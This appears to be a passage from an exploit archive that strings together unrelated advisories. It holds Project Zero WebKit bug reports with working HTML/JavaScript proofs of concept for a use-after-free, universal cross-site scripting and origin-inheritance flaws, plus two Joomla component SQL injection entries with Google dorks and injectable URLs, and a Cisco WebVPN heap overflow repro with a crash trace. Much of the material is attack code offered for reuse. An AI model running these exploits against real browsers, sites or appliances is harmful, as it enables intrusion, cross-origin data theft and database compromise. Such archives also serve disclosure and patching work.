setAttributeInternal(index, attrNode.qualifiedName(), attrNode.value(), NotInSynchronizationOfLazyAttribute);
attrNode.attachToElement(*this);
treeScope().adoptIfNeeded(attrNode);
ensureAttrNodeListForElement(*this).append(&attrNode);
return WTFMove(oldAttrNode);
}
|setAttributeInternal| may execute arbitrary JavaScript. If |setAttributeNodeNS| is called again in |setAttributeInternal|, there will be two |Attr| that has the same owner element and the same name after the first |setAttributeNodeNS| call. One of the |Attr|s will hold the raw pointer of the owner element even if the owner element is freed.
PoC:
-->
<body>
<script>
function gc() {
for (let i = 0; i < 0x40; i++) {
new ArrayBuffer(0x1000000);
}
}
window.callback = () => {
window.callback = null;
d.setAttributeNodeNS(src);
f.setAttributeNodeNS(document.createAttribute('src'));
};
let src = document.createAttribute('src');
src.value = 'javascript:parent.callback()';
let d = document.createElement('div');
let f = document.body.appendChild(document.createElement('iframe'));
f.setAttributeNodeNS(src);
f.remove();
f = null;
src = null;
gc();
alert(d.attributes[0].ownerElement);
</script>
</body>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1163
Here's a snippet of Document::prepareForDestruction
void Document::prepareForDestruction()
{
if (m_hasPreparedForDestruction)
return;
...
detachFromFrame();
m_hasPreparedForDestruction = true;
}
Document::prepareForDestruction is called on the assumption that the document will not be used again with its frame. However, if a frame caching is made in Document::prepareForDestruction, the document's frame will be stored in a CachedFrame object that will reattach the frame at some point, and thereafter, the document's frame will be never detached due to |m_hasPreparedForDestruction|.
PoC:
-->
<body>
Click anywhere.
<script>
function createURL(data, type = 'text/html') {
return URL.createObjectURL(new Blob([data], {type: type}));
}
function waitFor(check, cb) {
let it = setInterval(() => {
if (check()) {
clearInterval(it);
cb();
}
}, 10);
}
window.onclick = () => {
window.onclick = null;
w = open(createURL(''), '', 'width=500, height=500');
w.onload = () => {
setTimeout(() => {
let f = w.document.body.appendChild(document.createElement('iframe'));
f.contentWindow.onunload = () => {
f.contentWindow.onunload = null;
w.__defineGetter__('navigator', () => new Object());
let a = w.document.createElement('a');
a.href = 'about:blank';
a.click();
setTimeout(() => {
w.history.back();
setTimeout(() => {
let d = w.document;
w.location = 'javascript:' + encodeURI(`"<script>location = 'https://abc.xyz/';</scrip` + `t>"`);
let it = setInterval(() => {
try {
w.xxxx;
} catch (e) {
clearInterval(it);
let a = d.createElement('a');
a.href = 'javascript:alert(location);';
a.click();
}
}, 10);
}, 100);
}, 100);
};
w.location = 'javascript:""';
}, 0);
};
}
</script>
</body>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1197
This is similar to the case https://bugs.chromium.org/p/project-zero/issues/detail?id=1151.
But this time, javascript handlers may be fired in FrameLoader::open.
void FrameLoader::open(CachedFrameBase& cachedFrame)
{
...
clear(document, true, true, cachedFrame.isMainFrame()); <<--------- prepareForDestruction which fires unloads events is called.
...
}
PoC:
-->
<html>
<body>
Click anywhere...
<script>
function createURL(data, type = 'text/html') {
return URL.createObjectURL(new Blob([data], {type: type}));
}
function navigate(w, url) {
let a = w.document.createElement('a');
a.href = url;
a.click();
}
window.onclick = () => {
window.w = open('about:blank', 'w', 'width=500, height=500');
let i0 = w.document.body.appendChild(document.createElement('iframe'));
let i1 = w.document.body.appendChild(document.createElement('iframe'));
i0.contentWindow.onbeforeunload = () => {
i0.contentWindow.onbeforeunload = null;
navigate(w, 'about:blank');
};
navigate(i0.contentWindow, createURL(`
<body>
<script>
</scrip` + 't></body>'));
setTimeout(() => {
let g = i0.contentDocument.body.appendChild(document.createElement('iframe'));
let x = new g.contentWindow.XMLHttpRequest();
x.onabort = () => {
parseFloat('axfasdfasfdsfasfsfasdf');
i0.contentDocument.write();
navigate(w, 'https://abc.xyz/');
showModalDialog(createURL(`
<script>
let it = setInterval(() => {
try {
opener.w.document.x;
} catch (e) {
clearInterval(it);
window.close();
}
}, 10);
</scrip` + 't>'));
setTimeout(() => {
i1.srcdoc = '<script>alert(parent.location);</scrip' + 't>';
navigate(i1.contentWindow, 'about:srcdoc');
}, 10);
};
x.open('GET', createURL('x'.repeat(0x1000000)));
x.send();
w.history.go(-2);
}, 200);
};
</script>
</body>
</html>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1176
When a document loads "about:blank" or "about:srcdoc", it tries to inherit the security origin from its parent frame, or its opener frame if the parent frame doesn't exist. Normally, it doesn't happen that a subframe's document inherits its opener frame's security origin, because it has the parent frame. And it shouldn't happen at all. However, when the subframe is cached, only the parent frame is detached but not the opener frame. So, inheriting the opener frame's security origin could happen in that case.
void Document::initSecurityContext()
{
...
if (!shouldInheritSecurityOriginFromOwner(m_url)) <<----- check m_url is about:blank or about:srcdoc.
return;
// If we do not obtain a meaningful origin from the URL, then we try to
// find one via the frame hierarchy.
Frame* parentFrame = m_frame->tree().parent();
Frame* openerFrame = m_frame->loader().opener();
Frame* ownerFrame = parentFrame;
if (!ownerFrame)
ownerFrame = openerFrame;
if (!ownerFrame) {
didFailToInitializeSecurityOrigin();
return;
}
...
setCookieURL(ownerFrame->document()->cookieURL());
// We alias the SecurityOrigins to match Firefox, see Bug 15313
// https://bugs.webkit.org/show_bug.cgi?id=15313
setSecurityOriginPolicy(ownerFrame->document()->securityOriginPolicy());
...
}
PoC:
-->
<body>
Click anywhere.
<script>
window.onclick = () => {
window.onclick = null;
let w = open('about:blank', '', 'width=500, height=500');
w.eval(`
let f = document.body.appendChild(document.createElement('iframe'));
f.contentWindow.name = 'zzz';
opener.open('about:blank', 'zzz');
function navigate(w, url, cb = null) {
w.__check = true;
let a = w.document.createElement('a');
a.href = url;
a.click();
if (!cb)
return;
let it = setInterval(() => {
let navigated = false;
try {
if (!w.__check)
navigated = true;
} catch (e) {
navigated = true;
}
if (navigated) {
clearInterval(it);
cb();
}
}, 10);
}
navigate(opener, 'https://abc.xyz/', () => {
f.srcdoc = '<script>opener.alert(opener.location);</scrip' + 't>';
f.contentWindow.onbeforeunload = () => {
f.contentWindow.onbeforeunload = null;
navigate(window, 'about:blank');
};
navigate(f.contentWindow, 'about:srcdoc');
});`);
}
</script>
</body>
# # # # #
# Exploit Title: Joomla! Component Spider Catalog Lite v1.8.10 - SQL Injection
# Google Dork: inurl:index.php?option=com_spidercatalog
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/spider-catalog-lite/
# Demo: http://demo.web-dorado.com/spider-catalog.html
# Version: 1.8.10
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spidercatalog&product_id=40&view=showproduct&page_num=1&back=1&show_category_details=0&display_type=list&show_subcategories=0&show_subcategories_products=0&show_products=1&select_categories=0&Itemid=[SQL]
#
http://localhost/[PATH]/index.php?option=com_spidercatalog&view=spidercatalog&select_categories=[SQL]&show_category_details=1&display_type=cell&show_subcategories=1
# # # # #
# # # # #
# Exploit Title: Joomla! Component Spider Calendar Lite v3.2.16 - SQL Injection
# Google Dork: inurl:index.php?option=com_spidercalendar
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/spider-calendar-lite/
# Demo: http://demo.web-dorado.com/spider-calendar.html
# Version: 3.2.16
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1&module_id=92&date92=2017-02-3&cat_ids=&Itemid=[SQL]
# Etc...
# # # # #
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=998
The WebVPN http server exposes a way of accessing files from CIFS with a url hook of the form: https://portal/+webvpn+/CIFS_R/share_server/share_name/file.
When someone logged into the portal navigates to such an address, the http_cifs_process_path function parses the request URI and creates 2 C strings in a http_cifs_context struct:
http_cifs_context:
+0x160 char* file_dir
+0x168 char* file_name
These strings are copied in various places, but is done incorrectly. For example, in ewaURLHookCifs, there is the following pseudocode:
filename_copy_buf = calloc(1LL, 336LL);
net_handle[10] = filename_copy_buf;
if ( filename_copy_buf )
{
src_len = _wrap_strlen(filename_from_request);
if ( filename_from_request[src_len - 1] == ('|') )
{
// wrong length (src length)
strncpy((char *)filename_copy_buf, filename_from_request,
src_len - 1);
}
In this case, a fixed size buf (|filename_copy_buf|) is allocated. Later, strncpy is called to copy to it, but the length passed is the length of the src string, which can be larger than 366 bytes. This leads to heap overflow.
There appear to be various other places where the copying is done in an unsafe way:
http_cifs_context_to_name, which is called from ewaFile{Read,Write,Get}Cifs, and ewaFilePost, uses strcat to copy the file path and file name to a fixed size (stack) buffer.
http_cifs_pre_fopen, which has a similar issue with passing the length of the src buffer to strncpy.
Possibly http_add_query_str_from_context. There are probably others that I missed.
Note that triggering this bug requires logging in to the WebVPN portal first, but the cifs share does not need to exist.
Repro:
Login to WebVPN portal, navigate to:
https://portal/+webvpn+/CIFS_R/server/name/ followed by 500 'A's.
("server" and "name" may be passed verbatim)
*** Error in `lina': malloc(): memory corruption: 0x00007fa40c53f570 ***
======= Backtrace: =========
/lib64/libc.so.6(+0x3f0486e74f)[0x7fa4139fc74f]
/lib64/libc.so.6(+0x3f048783ee)[0x7fa413a063ee]
/lib64/libc.so.6(+0x3f0487be99)[0x7fa413a09e99]
/lib64/libc.so.6(__libc_malloc+0x60)[0x7fa413a0b5a0]
lina(+0x321976a)[0x7fa41a2b276a]
lina(mem_mh_calloc+0x123)[0x7fa41a2b4c83]
lina(resMgrCalloc+0x100)[0x7fa419659410]
lina(calloc+0x94)[0x7fa419589a34]
lina(ewsFileSetupFilesystemDoc+0x28)[0x7fa41826a608]
lina(ewsServeFindDocument+0x142)[0x7fa418278192]
lina(ewsServeStart+0x114)[0x7fa4182784a4]
lina(ewsParse+0x19a0)[0x7fa418272cc0]
lina(ewsRun+0x9c)[0x7fa41826955c]
lina(emweb_th+0x6ab)[0x7fa418286aeb]
lina(+0xde58ab)[0x7fa417e7e8ab]
This was tested on 9.6(2)